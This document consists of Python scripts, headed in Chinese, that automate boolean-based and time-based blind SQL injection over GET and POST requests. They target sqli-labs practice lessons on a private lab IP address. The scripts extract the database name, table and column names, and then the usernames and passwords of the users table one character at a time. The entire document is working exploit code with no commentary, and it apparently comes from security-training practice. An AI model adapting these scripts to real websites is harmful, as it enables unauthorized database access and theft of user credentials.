GET布爾盲注
import requests
import time
import datetime
# 獲取數據庫名長度
def database_len():
for i in range(1, 10):
url = '''http://10.211.55.7/sqli-labs-master/Less-8/'''
payload = '''?id=1' and length(database())>%s''' % i
# print(url+payload+'%23')
r = requests.get(url + payload + '%23')
if 'You are in' not in r.text:
#print(i)
#else:
print('database_length:', i)
break
database_len()
#獲取數據庫名
def database_name():
name = ''
for j in range(1, 9):
for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr(database(),%d,1)='%s'" % (
j, i)
# print(url+'%23')
r = requests.get(url + '%23')
if 'You are in' in r.text:
name = name + i
# print(name)
break
print('database_name:', name)
database_name()
# 獲取數據庫表
def tables_name():
name = ''
for j in range(1, 30):
for i in 'abcdefghijklmnopqrstuvwxyz,':
url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" % (
j, i)
r = requests.get(url + '%23')
if 'You are in' in r.text:
name = name + i
# print(name)
break
print('table_name:', name)
tables_name()
# 獲取表中字段
def columns_name():
name = ''
for j in range(1, 30):
for i in 'abcdefghijklmnopqrstuvwxyz,':
url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" % (
j, i)
r = requests.get(url + '%23')
if 'You are in' in r.text:
name = name + i
# print(name)
break
print('column_name:', name)
columns_name()
# 獲取username
def username_value():
name = ''
for j in range(1, 100):
for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" % (
j, i)
r = requests.get(url + '%23')
if 'You are in' in r.text:
name = name + i
# print(name)
break
print('username_value:', name)
username_value()
# 獲取password
def password_value():
name = ''
for j in range(1, 100):
for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" % (
j, i)
r = requests.get(url + '%23')
if 'You are in' in r.text:
name = name + i
# print(name)
break
print('password_value:', name)
password_value()
GET時間盲注
import datetime
import requests
import time
# 獲取數據庫名長度
def database_len():
for i in range(1, 10):
url = '''http://10.211.55.7/sqli-labs-master/Less-10/'''
payload = '''?id=1" and if(length(database())>%s,sleep(1),0)''' % i
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload + '%23')
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 1:
print(i)
else:
print(i)
break
print('database_len:', i)
database_len()
# 獲取數據庫名
def database_name():
name = ''
for j in range(1, 9):
for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % (
j, i)
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload + '%23')
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 1:
name += i
# print(name)
break
print('database_name:', name)
database_name()
# 獲取數據庫表
def table_name():
name = ''
for j in range(1, 30):
for i in 'abcdefghijklmnopqrstuvwxyz,':
url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
payload = '''?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(1),1)''' % (
j, i)
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload + '%23')
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 1:
name += i
# print(name)
break
print('table_name:', name)
table_name()
# 獲取表中字段
def column_name():
name = ''
for j in range(1, 30):
for i in 'abcdefghijklmnopqrstuvwxyz,':
url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
payload = '''?id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s',sleep(1),1)''' % (
j, i)
time1 = datetime.datetime.now()
r = requests.get(url+payload+'%23')
time2 = datetime.datetime.now()
sec = (time2-time1).seconds
if sec >=1:
name += i
# print(name)
break
print('column_name:',name)
column_name()
# 獲取username
def username_value():
name = ''
for j in range(1, 100):
for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
payload = '''?id=1' and if(substr((select group_concat(username) from users ),%d,1)='%s',sleep(1),1)''' % (
j, i)
time1 = datetime.datetime.now()
r = requests.get(url+payload+'%23')
time2 = datetime.datetime.now()
sec = (time2-time1).seconds
if sec >=1:
name += i
# print(name)
break
print('username_value:',name)
username_value()
# 獲取username
def password_value():
name = ''
for j in range(1, 100):
for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
payload = '''?id=1' and if(substr((select group_concat(password) from users ),%d,1)='%s',sleep(1),1)''' % (
j, i)
time1 = datetime.datetime.now()
r = requests.get(url+payload+'%23')
time2 = datetime.datetime.now()
sec = (time2-time1).seconds
if sec >=1:
name += i
# print(name)
break
print('password_value:',name)
password_value()
POST布爾盲注
import requests
# 獲取數據庫名長度
def database_len():
for i in range(1, 10):
url = '''http://10.211.55.7/sqli-labs-master/Less-16/'''
payload = '''admin") and length(database())>%s #''' % i
data = {'uname':payload,'passwd':'admin'}
# print(url+payload+'%23')
r = requests.post(url, data)
if 'flag.jpg' in r.text:
print(i)
else:
print('database_length:', i)
break
database_len()
#獲取數據庫名
def database_name():
name = ''
for j in range(1, 9):
for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
url = '''http://10.211.55.7/sqli-labs-master/Less-16/'''
payload = "admin' and substr(database(),%d,1)='%s' #" % (
j, i)
data = {'uname':payload,'passwd':'admin'}
# print(url+'%23')
r = requests.post(url,data)
if 'flag.jpg' in r.text:
name = name + i
# print(name)
break
print('database_name:', name)
database_name()
#獲取數據庫表
def table_name():
name = ''
for j in range(1, 30):
for i in 'abcdefghijklmnopqrstuvwxyz,':
url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
payload = "admin' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s' #" % (
j, i)
data = {'uname':payload,'passwd':'admin'}
# print(url+'%23')
r = requests.post(url,data)
if 'flag.jpg' in r.text:
name = name + i
# print(name)
break
print('table_name:', name)
table_name()
#獲取表中字段名
def column_name():
name = ''
for j in range(1, 30):
for i in 'abcdefghijklmnopqrstuvwxyz,':
url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
payload = "admin' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s' #" % (
j, i)
data = {'uname':payload,'passwd':'admin'}
# print(url+'%23')
r = requests.post(url,data)
if 'flag.jpg' in r.text:
name = name + i
# print(name)
break
print('column_name:', name)
column_name()
#獲取username
def username_value():
name = ''
for j in range(1, 100):
for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
payload = "admin' and substr((select group_concat(username) from security.users),%d,1)='%s' #" % (
j, i)
data = {'uname':payload,'passwd':'admin'}
# print(url+'%23')
r = requests.post(url,data)
if 'flag.jpg' in r.text:
name = name + i
# print(name)
break
print('username_value:', name)
username_value()
#獲取password
def password_value():
name = ''
for j in range(1, 100):
for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
payload = "admin' and substr((select group_concat(password) from security.users),%d,1)='%s' #" % (
j, i)
data = {'uname':payload,'passwd':'admin'}
# print(url+'%23')
r = requests.post(url,data)
if 'flag.jpg' in r.text:
name = name + i
# print(name)
break
print('password_value:', name)
password_value()